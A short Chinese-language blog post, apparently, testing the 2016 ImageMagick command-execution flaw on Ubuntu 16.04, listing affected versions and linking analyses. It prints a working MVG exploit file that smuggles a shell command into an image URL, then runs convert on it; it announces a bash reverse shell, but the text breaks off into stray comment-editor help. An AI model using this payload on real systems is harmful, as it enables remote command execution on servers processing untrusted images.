这两天刚爆的ImageMagick命令执行漏洞比较火。
影响版本范围
ImageMagick 6.5.7-8 2012-08-17(手工测试风险存在)
ImageMagick 6.7.7-10 2014-03-06(手工测试风险存在)
低版本至6.9.3-9 released 2016-04-30
漏洞分析:
http://bobao.360.cn/learning/detail/2863.html
http://ricterz.me/posts/Write%20Up%3A%20Remote%20Command%20Execute%20in%20Wordpress%204.5.1?_=1462514836692
http://drops.wooyun.org/papers/15589
来测试下
Ubuntun16.04
convert --version
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|ls -la")'
pop graphic-context
执行convert exp1.gif xx.png
下面我们来用bash来反弹shell看看
**粗体** _斜体_ [链接](http://example.com) `代码` - 列表 > 引用
。你还可以使用@
来通知其他用户。